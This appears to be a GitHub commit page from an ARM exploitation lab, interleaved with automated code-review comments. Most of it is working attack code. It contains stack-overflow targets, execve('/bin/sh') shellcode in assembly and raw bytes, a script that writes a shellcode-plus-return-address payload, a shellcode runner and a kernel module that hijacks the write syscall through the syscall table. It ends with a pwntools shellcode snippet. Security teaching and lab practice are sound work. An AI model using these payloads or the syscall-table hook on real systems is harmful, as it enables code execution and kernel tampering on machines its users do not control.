손지언

dd

Showing 74 changed files with 618 additions and 0 deletions
#include<stdio.h>
#include<string.h>
int main(){
char buf[40];
char temp;
printf("buf = (%p)\n", buf);
temp = fgetc(stdin);
FILE* fp = fopen("input.text","r");
fread(buf,100,1,fp);
printf("%s, \n",buf);
return 0;
}
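Review bot: `fread(buf,100,1,fp)` can write up to 100 bytes into `char buf[40]`, so any input.text longer than 40 bytes overruns the stack buffer, and `fp` is used without checking that `fopen` succeeded. If the overflow is the point of the exercise, a header comment such as `/* deliberately vulnerable lab target: build only inside the training VM */` should say so; otherwise bound the read with `size_t n = fread(buf, 1, sizeof buf - 1, fp); buf[n] = '\0';` and return early when `fp == NULL`. The later `printf("%s, \n",buf)` also relies on a terminator that `fread` never writes. The same file appears again further down the page with the same issues.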
import struct
f = open("input.text",'wb')
i = int(input())
if(i == 0):
msg = b"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78'" + b'\x64'*23 + b"\xc8\xf3\xff\x7e"
else:
msg = b"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78'" + b'\x64'*23 + b"\xe8\x63\xfb\x7e"
f.write(msg)
f.close()
#f = open("input.text",'ab')
#n = input()
#add = int(n,16)
#print(add)
#addr = struct.pack('<L',add)
#f.write(addr)
#f.close()
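Review bot: `import struct` is referenced only by the commented-out block at the end, and that block is dead code that should be either deleted or restored rather than committed as comments. The file handle is opened and closed by hand; `with open("input.text", 'wb') as f:` closes it on every path. The two `msg` literals are undocumented opaque bytes, so a comment stating which lab binary and environment each belongs to would keep the file from being mistaken for ordinary test data. The same script is repeated later on the page.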
#include <stdio.h>
int main(int argc, char* argv[]){
int len=0;
int i =0;
while(argv[1][i]<='9'&&argv[1][i]>='0'){
len += argv[1][i]-48;
len *= 10;
i++;
}
len /= 10;
printf("%d\n",len);
while(len-->0){
putc('0',stdout);
}
printf("\n");
}
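Review bot: `argv[1][i]` is read without checking `argc`, so running the program with no argument dereferences a null pointer; add `if (argc < 2) return 1;` before the loop. `len` is a signed `int` that is multiplied by 10 for every digit, so a long digit string overflows it, which is undefined behaviour; `strtol` with an `ERANGE` check, or a cap on the accepted value, avoids that. The second loop then prints `len` characters, so an unchecked value also decides how much output is produced.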
#include <stdio.h>
#include <string.h>
#include <err.h>
#include <stdlib.h>
char buf[2048];
int main()
{
if (!fgets(buf, sizeof(buf), stdin))
err(1, "Too long input");
// a few info for debugging
printf("> length: %d\n", (int)strlen(buf));
for (int i = 0; i < strlen(buf); i += 1) {
if (i % 16 == 0)
printf("> %04X: ", i);
printf("%02X ", (unsigned char)buf[i]);
if (i % 16 == 15)
printf("\n");
}
printf("\n");
(*(void (*)()) buf)();
}
\ No newline at end of file
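Review bot: `err(1, "Too long input")` fires when `fgets` returns NULL, which means end-of-file or a read error rather than over-long input, and `err` then appends an unrelated `errno` string; `errx(1, "no input")` matches what actually happened. The dump loop compares `int i` against `strlen(buf)` and recomputes the length on every pass; hoist it into a `size_t len` and index with `size_t`. Since the last statement transfers control into whatever bytes arrived on stdin, the file needs a header comment saying it is a test harness to be run only inside an isolated lab VM.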
.section .text
.global _start
_start:
add r0, pc, #12
mov r1, #0
mov r2, #0
mov r7, #11
svc #0
.ascii "/bin/sh\0"
\ No newline at end of file
.section .text
.global _start
_start:
.code 32
add r3, pc, #1
bx r3
.code 16
add r0, pc, #8
eor r1, r1, r1
eor r2, r2, r2
strb r2, [r0, #7]
mov r7, #11
svc #1
.ascii "/bin/shx"
\ No newline at end of file
#include<stdio.h>
#include<string.h>
int main(){
char buf[40];
char temp;
printf("buf = (%p)\n", buf);
temp = fgetc(stdin);
FILE* fp = fopen("input.text","r");
fread(buf,100,1,fp);
printf("%s, \n",buf);
return 0;
}
import struct
f = open("input.text",'wb')
i = int(input())
if(i == 0):
msg = b"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78'" + b'\x64'*23 + b"\xc8\xf3\xff\x7e"
else:
msg = b"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78'" + b'\x64'*23 + b"\xe8\x63\xfb\x7e"
f.write(msg)
f.close()
#f = open("input.text",'ab')
#n = input()
#add = int(n,16)
#print(add)
#addr = struct.pack('<L',add)
#f.write(addr)
#f.close()
#include<stdlib.h>
#include<unistd.h>
#include<stdio.h>
int main(int argc, char **argv){
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0){
printf("success!\n");
}
else{
printf("try again!\n");
}
}
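Review bot: `gets(buffer)` has no length limit and was removed from the language in C11, so a line of 64 or more characters writes past `buffer`, presumably into the adjacent `modified`. If this is meant as a deliberately vulnerable exercise target, say so in a comment at the top of the file so it is never copied into real code; the bounded form is `fgets(buffer, sizeof buffer, stdin)`. Current toolchains warn about or reject `gets`, which is worth recording in the build instructions.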
#include<stdlib.h>
#include<unistd.h>
#include<stdio.h>
#include<string.h>
#include<err.h>
int main(int argc, char **argv){
volatile int modified;
char buffer[64];
if(argc != 2){
perror("argc");
}
modified = 0;
strcpy(buffer,argv[1]);
if(modified == 0x61626364){
printf("success!\n");
}
else{
printf("try again!, you got 0x%08x\n",modified);
}
}
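Review bot: When `argc != 2` the code calls `perror("argc")` and carries on, so with no argument `strcpy(buffer,argv[1])` is handed a null pointer; `perror` also prints whatever stale `errno` text happens to be current. `<err.h>` is already included, so `if (argc != 2) errx(1, "usage: %s <string>", argv[0]);` exits cleanly. The `strcpy` into the 64-byte `buffer` is unbounded; if that is the intended exercise, mark the file as a deliberately vulnerable target in a header comment. `modified` is an `int` printed with `%08x`, which expects an `unsigned int`.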
#include<stdio.h>
void main(){
system("/bin/sh");
}
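Review bot: `system` is declared in `<stdlib.h>`, which this file does not include, so the call relies on an implicit declaration that newer compilers reject; add `#include <stdlib.h>`. `void main()` is non-standard; `int main(void)` with an explicit `return` is the portable form.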
export APP_NAME=hello_world
export MOD_NAME=hooker
PWD=$(shell pwd)
APP_PATH=$(PWD)/d$(APP_NAME)
MOD_PATH=$(PWD)/d$(MOD_NAME)
all: $(MOD_NAME) $(APP_NAME)
$(MOD_NAME):
$(MAKE) -C $(MOD_PATH)
mv $(MOD_PATH)/$@.ko $(PWD)
$(APP_NAME):
$(MAKE) -C $(APP_PATH)
mv $(APP_PATH)/$@ $(PWD)
clean:
$(RM) $(PWD)/$(MOD_NAME).ko
$(RM) $(PWD)/$(APP_NAME)
arm-linux-gnueabihf-gcc -C $(MOD_PATH) clean
arm-linux-gnueabihf-gcc -C $(APP_PATH) clean
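Review bot: The `clean` recipe runs `arm-linux-gnueabihf-gcc -C $(MOD_PATH) clean`, which invokes the compiler with a preprocessor flag instead of recursing into the sub-makefile; both lines should read `$(MAKE) -C $(MOD_PATH) clean` and `$(MAKE) -C $(APP_PATH) clean`, as the build rules above them do. `all` and `clean` are not declared `.PHONY`, and `$(APP_NAME)` is named after the file that `mv` places in `$(PWD)`, so once that file exists make will consider the target up to date and skip the rebuild. The same Makefile is repeated twice more on the page.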
APP_NAME := hello_world
all:
arm-linux-gnueabihf-gcc -o $(APP_NAME) $(APP_NAME).c
clean:
$(RM) $(APP_NAME).o
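Review bot: `clean` removes `$(APP_NAME).o`, but the `all` rule compiles and links in one step with `-o $(APP_NAME)`, so no object file is produced and the binary itself is left behind; `$(RM) $(APP_NAME)` is what the rule needs. The compile line has no warning flags; `-Wall -Wextra -Wformat-security` would be expected to flag the non-literal format string in the program it builds.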
#include <stdio.h>
int main(int argc, char *argv[]){
char sHelloMsg[] = {"Hello world!"};
printf(sHelloMsg);
return 0;
}
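Review bot: `printf(sHelloMsg)` passes a variable as the format string; the content is constant here, but the pattern becomes a format-string bug as soon as the buffer holds anything external. Use `fputs(sHelloMsg, stdout);` or `printf("%s", sHelloMsg);`. `argc` and `argv` are unused, so `int main(void)` is enough. The two later copies of this file on the page contain the same call.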
cmd_/root/hooking/dhooker/hooker.ko := arm-linux-gnueabihf-ld -EL -r -T ./scripts/module-common.lds --build-id -o /root/hooking/dhooker/hooker.ko /root/hooking/dhooker/hooker.o /root/hooking/dhooker/hooker.mod.o
/root/hooking/dhooker/hooker.ko
/root/hooking/dhooker/hooker.o
obj-m := hooker.o
KDIR=/root/working/linux
PWD=$(shell pwd)
TOOLCHAIN=arm-linux-gnueabihf-
TARGET=arm
all:
$(MAKE) -C $(KDIR) M=$(PWD) ARCH=$(TARGET) CROSS_COMPILE=$(TOOLCHAIN) modules
clean:
$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) clean
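Review bot: `all` passes the module directory as `M=$(PWD)` while `clean` uses `SUBDIRS=$(PWD)`, an older spelling that later kernel build systems no longer accept; use `M=$(PWD)` in both. `KDIR=/root/working/linux` hard-codes one machine's tree, so `KDIR ?= /root/working/linux` would let other builders override it. The `.cmd`, `.mod.c` and `modules.order` outputs of this build are committed alongside it and embed `/root/...` paths; they belong in `.gitignore` rather than in the repository.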
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/syscalls.h>
#include <linux/string.h>
#define SYSCALL_TABLE_BASE_ADDR (0x8000fc28)
#define MANAGER_PERMISSION (0xff)
unsigned int ** g_puSysTableAddr = (unsigned int**) SYSCALL_TABLE_BASE_ADDR;
unsigned int g_uPrevAP = 0x00;
unsigned int g_uNewAP = MANAGER_PERMISSION;
unsigned int (* sys_write_orig)(int fd, char *byf, size_t count);
//sys_write_orig() 호출 전 pBuF의 내용 수정
unsigned int sys_write_hooked(int nFD, char *pBuf, size_t nCnt){
if(nFD == 1){
memset(pBuf, 0, nCnt);
strcpy(pBuf, "Hacked!!!\n");
return sys_write_orig(nFD,pBuf, nCnt);
}
else{
return sys_write_orig(nFD,pBuf, nCnt);
}
}
int __init Hook_Init(void){
sys_write_orig = (void *)g_puSysTableAddr[__NR_write];
__asm__ __volatile__("mrc p15, 0, %0, c3, c0" : "=r"(g_uPrevAP));
__asm__ __volatile__("mrc p15, 0, %0, c3, c0" : : "r"(g_uNewAP));
g_puSysTableAddr[__NR_write] = (unsigned int *) sys_write_hooked;
__asm__ __volatile__("mcr p15,0, %0, c3, c0" : :"r"(g_uPrevAP));
return 0;
}
void __exit Hook_Exit(void){
__asm__ __volatile__("mrc p15,0, %0, c3,c0" : "=r"(g_uPrevAP));
__asm__ __volatile__("mcr p15, 0, %0, c3, c0" : :"r"(g_uNewAP));
g_puSysTableAddr[__NR_write] = (unsigned int *) sys_write_orig;
__asm__ __volatile__("mcr p15,0, %0, c3, c0" : :"r"(g_uPrevAP));
}
module_init(Hook_Init);
module_exit(Hook_Exit);
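Review bot: `sys_write_hooked` calls `memset` and `strcpy` directly on `pBuf`, which for a write syscall is a user-space pointer, and the `strcpy` stores 11 bytes whatever `nCnt` is, so a short write overruns the caller's buffer and a bad pointer faults in kernel context. `SYSCALL_TABLE_BASE_ADDR` is a literal that can only be valid for one kernel image; on any other build `Hook_Init` would overwrite an arbitrary kernel word. The file has no `MODULE_LICENSE` and no header comment; add something like `/* lab demo: patches the syscall table, load only in a disposable VM */` so nobody loads it on a real host. For readers on the defensive side, a syscall-table slot that points into module memory, which is what the assignment to `g_puSysTableAddr[__NR_write]` sets up, is the artefact kernel integrity checks look for. The two later revisions of this file on the page carry the same issues.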
#include <linux/module.h>
#include <linux/vermagic.h>
#include <linux/compiler.h>
MODULE_INFO(vermagic, VERMAGIC_STRING);
__visible struct module __this_module
__attribute__((section(".gnu.linkonce.this_module"))) = {
.name = KBUILD_MODNAME,
.init = init_module,
#ifdef CONFIG_MODULE_UNLOAD
.exit = cleanup_module,
#endif
.arch = MODULE_ARCH_INIT,
};
static const struct modversion_info ____versions[]
__used
__attribute__((section("__versions"))) = {
{ 0xb344870e, __VMLINUX_SYMBOL_STR(module_layout) },
{ 0x2e5810c6, __VMLINUX_SYMBOL_STR(__aeabi_unwind_cpp_pr1) },
{ 0xfa2a45e, __VMLINUX_SYMBOL_STR(__memzero) },
{ 0xb1ad28e0, __VMLINUX_SYMBOL_STR(__gnu_mcount_nc) },
};
static const char __module_depends[]
__used
__attribute__((section(".modinfo"))) =
"depends=";
MODULE_INFO(srcversion, "2DEEDF502E82CB7C5A221F0");
kernel//root/hooking/dhooker/hooker.ko
export APP_NAME=hello_world
export MOD_NAME=hooker
PWD=$(shell pwd)
APP_PATH=$(PWD)/d$(APP_NAME)
MOD_PATH=$(PWD)/d$(MOD_NAME)
all: $(MOD_NAME) $(APP_NAME)
$(MOD_NAME):
$(MAKE) -C $(MOD_PATH)
mv $(MOD_PATH)/$@.ko $(PWD)
$(APP_NAME):
$(MAKE) -C $(APP_PATH)
mv $(APP_PATH)/$@ $(PWD)
clean:
$(RM) $(PWD)/$(MOD_NAME).ko
$(RM) $(PWD)/$(APP_NAME)
arm-linux-gnueabihf-gcc -C $(MOD_PATH) clean
arm-linux-gnueabihf-gcc -C $(APP_PATH) clean
APP_NAME := hello_world
all:
arm-linux-gnueabihf-gcc -o $(APP_NAME) $(APP_NAME).c
clean:
$(RM) $(APP_NAME).o
#include <stdio.h>
int main(int argc, char *argv[]){
char sHelloMsg[] = {"Hello world!\n"};
printf(sHelloMsg);
return 0;
}
cmd_/root/hooking/dhooker/hooker.ko := arm-linux-gnueabihf-ld -EL -r -T ./scripts/module-common.lds --build-id -o /root/hooking/dhooker/hooker.ko /root/hooking/dhooker/hooker.o /root/hooking/dhooker/hooker.mod.o
/root/hooking/dhooker/hooker.ko
/root/hooking/dhooker/hooker.o
obj-m := hooker.o
KDIR=/root/working/linux
PWD=$(shell pwd)
TOOLCHAIN=arm-linux-gnueabihf-
TARGET=arm
all:
$(MAKE) -C $(KDIR) M=$(PWD) ARCH=$(TARGET) CROSS_COMPILE=$(TOOLCHAIN) modules
clean:
$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) clean
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/syscalls.h>
#include <linux/string.h>
#define SYSCALL_TABLE_BASE_ADDR (0x8000fc28)
#define MANAGER_PERMISSION (0xff)
unsigned int ** g_puSysTableAddr = (unsigned int**) SYSCALL_TABLE_BASE_ADDR;
unsigned int g_uPrevAP = 0x00;
unsigned int g_uNewAP = MANAGER_PERMISSION;
unsigned int (* sys_write_orig)(int fd, char *byf, size_t count);
//sys_write_orig() 호출 전 pBuF의 내용 수정
unsigned int sys_write_hooked(int nFD, char *pBuf, size_t nCnt){
if(current->comm == "hello_world" && nFD == 1){
memset(pBuf, 0, nCnt);
strcpy(pBuf, "Hacked!!!\n");
return sys_write_orig(nFD,pBuf, nCnt);
}
else{
return sys_write_orig(nFD,pBuf, nCnt);
}
}
int __init Hook_Init(void){
sys_write_orig = (void *)g_puSysTableAddr[__NR_write];
__asm__ __volatile__("mrc p15, 0, %0, c3, c0" : "=r"(g_uPrevAP));
__asm__ __volatile__("mrc p15, 0, %0, c3, c0" : : "r"(g_uNewAP));
g_puSysTableAddr[__NR_write] = (unsigned int *) sys_write_hooked;
__asm__ __volatile__("mcr p15,0, %0, c3, c0" : :"r"(g_uPrevAP));
return 0;
}
void __exit Hook_Exit(void){
__asm__ __volatile__("mrc p15,0, %0, c3,c0" : "=r"(g_uPrevAP));
__asm__ __volatile__("mcr p15, 0, %0, c3, c0" : :"r"(g_uNewAP));
g_puSysTableAddr[__NR_write] = (unsigned int *) sys_write_orig;
__asm__ __volatile__("mcr p15,0, %0, c3, c0" : :"r"(g_uPrevAP));
}
module_init(Hook_Init);
module_exit(Hook_Exit);
#include <linux/module.h>
#include <linux/vermagic.h>
#include <linux/compiler.h>
MODULE_INFO(vermagic, VERMAGIC_STRING);
__visible struct module __this_module
__attribute__((section(".gnu.linkonce.this_module"))) = {
.name = KBUILD_MODNAME,
.init = init_module,
#ifdef CONFIG_MODULE_UNLOAD
.exit = cleanup_module,
#endif
.arch = MODULE_ARCH_INIT,
};
static const struct modversion_info ____versions[]
__used
__attribute__((section("__versions"))) = {
{ 0xb344870e, __VMLINUX_SYMBOL_STR(module_layout) },
{ 0x2e5810c6, __VMLINUX_SYMBOL_STR(__aeabi_unwind_cpp_pr1) },
{ 0xfa2a45e, __VMLINUX_SYMBOL_STR(__memzero) },
{ 0xb1ad28e0, __VMLINUX_SYMBOL_STR(__gnu_mcount_nc) },
};
static const char __module_depends[]
__used
__attribute__((section(".modinfo"))) =
"depends=";
MODULE_INFO(srcversion, "D2F3FA25DCB0D285CB3AE41");
kernel//root/hooking/dhooker/hooker.ko
export APP_NAME=hello_world
export MOD_NAME=hooker
PWD=$(shell pwd)
APP_PATH=$(PWD)/d$(APP_NAME)
MOD_PATH=$(PWD)/d$(MOD_NAME)
all: $(MOD_NAME) $(APP_NAME)
$(MOD_NAME):
$(MAKE) -C $(MOD_PATH)
mv $(MOD_PATH)/$@.ko $(PWD)
$(APP_NAME):
$(MAKE) -C $(APP_PATH)
mv $(APP_PATH)/$@ $(PWD)
clean:
$(RM) $(PWD)/$(MOD_NAME).ko
$(RM) $(PWD)/$(APP_NAME)
arm-linux-gnueabihf-gcc -C $(MOD_PATH) clean
arm-linux-gnueabihf-gcc -C $(APP_PATH) clean
APP_NAME := hello_world
all:
arm-linux-gnueabihf-gcc -o $(APP_NAME) $(APP_NAME).c
clean:
$(RM) $(APP_NAME).o
#include <stdio.h>
int main(int argc, char *argv[]){
char sHelloMsg[] = {"Hello world!\n"};
printf(sHelloMsg);
return 0;
}
cmd_/root/hooking/dhooker/hooker.ko := arm-linux-gnueabihf-ld -EL -r -T ./scripts/module-common.lds --build-id -o /root/hooking/dhooker/hooker.ko /root/hooking/dhooker/hooker.o /root/hooking/dhooker/hooker.mod.o
/root/hooking/dhooker/hooker.ko
/root/hooking/dhooker/hooker.o
obj-m := hooker.o
KDIR=/root/working/linux
PWD=$(shell pwd)
TOOLCHAIN=arm-linux-gnueabihf-
TARGET=arm
all:
$(MAKE) -C $(KDIR) M=$(PWD) ARCH=$(TARGET) CROSS_COMPILE=$(TOOLCHAIN) modules
clean:
$(MAKE) -C $(KDIR) SUBDIRS=$(PWD) clean
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/syscalls.h>
#include <linux/string.h>
#define SYSCALL_TABLE_BASE_ADDR (0x8000fc28)
#define MANAGER_PERMISSION (0xff)
unsigned int ** g_puSysTableAddr = (unsigned int**) SYSCALL_TABLE_BASE_ADDR;
unsigned int g_uPrevAP = 0x00;
unsigned int g_uNewAP = MANAGER_PERMISSION;
unsigned int (* sys_write_orig)(int fd, char *byf, size_t count);
//sys_write_orig() 호출 전 pBuF의 내용 수정
unsigned int sys_write_hooked(int nFD, char *pBuf, size_t nCnt){
printk("current process name : %s\n",current->comm);
if(current->comm == "hello_world" && nFD == 1){
memset(pBuf, 0, nCnt);
strcpy(pBuf, "Hacked!!!\n");
return sys_write_orig(nFD,pBuf, nCnt);
}
else{
return sys_write_orig(nFD,pBuf, nCnt);
}
}
int __init Hook_Init(void){
sys_write_orig = (void *)g_puSysTableAddr[__NR_write];
__asm__ __volatile__("mrc p15, 0, %0, c3, c0" : "=r"(g_uPrevAP));
__asm__ __volatile__("mrc p15, 0, %0, c3, c0" : : "r"(g_uNewAP));
g_puSysTableAddr[__NR_write] = (unsigned int *) sys_write_hooked;
__asm__ __volatile__("mcr p15,0, %0, c3, c0" : :"r"(g_uPrevAP));
return 0;
}
void __exit Hook_Exit(void){
__asm__ __volatile__("mrc p15,0, %0, c3,c0" : "=r"(g_uPrevAP));
__asm__ __volatile__("mcr p15, 0, %0, c3, c0" : :"r"(g_uNewAP));
g_puSysTableAddr[__NR_write] = (unsigned int *) sys_write_orig;
__asm__ __volatile__("mcr p15,0, %0, c3, c0" : :"r"(g_uPrevAP));
}
module_init(Hook_Init);
module_exit(Hook_Exit);
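Review bot: The `printk("current process name : %s\n",current->comm)` in this revision runs on every write syscall from every process and carries no log level, so it floods the kernel log, and any daemon that writes that log out to a file re-enters the hook. If the trace is needed during the lab, rate-limit it with `printk_ratelimited(KERN_DEBUG "...")`, and remove it before committing. `current` comes from `<linux/sched.h>`, which the file does not include directly.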
#include <linux/module.h>
#include <linux/vermagic.h>
#include <linux/compiler.h>
MODULE_INFO(vermagic, VERMAGIC_STRING);
__visible struct module __this_module
__attribute__((section(".gnu.linkonce.this_module"))) = {
.name = KBUILD_MODNAME,
.init = init_module,
#ifdef CONFIG_MODULE_UNLOAD
.exit = cleanup_module,
#endif
.arch = MODULE_ARCH_INIT,
};
static const struct modversion_info ____versions[]
__used
__attribute__((section("__versions"))) = {
{ 0xb344870e, __VMLINUX_SYMBOL_STR(module_layout) },
{ 0x2e5810c6, __VMLINUX_SYMBOL_STR(__aeabi_unwind_cpp_pr1) },
{ 0xfa2a45e, __VMLINUX_SYMBOL_STR(__memzero) },
{ 0x27e1a049, __VMLINUX_SYMBOL_STR(printk) },
{ 0xb1ad28e0, __VMLINUX_SYMBOL_STR(__gnu_mcount_nc) },
};
static const char __module_depends[]
__used
__attribute__((section(".modinfo"))) =
"depends=";
MODULE_INFO(srcversion, "1041E4758432C86606FD67E");
kernel//root/hooking/dhooker/hooker.ko
from pwn import *
context.update(arch='arm', os='linux')
shellcode = shellcraft.to_thumb()
shellcode += shellcraft.thumb.linux.sh()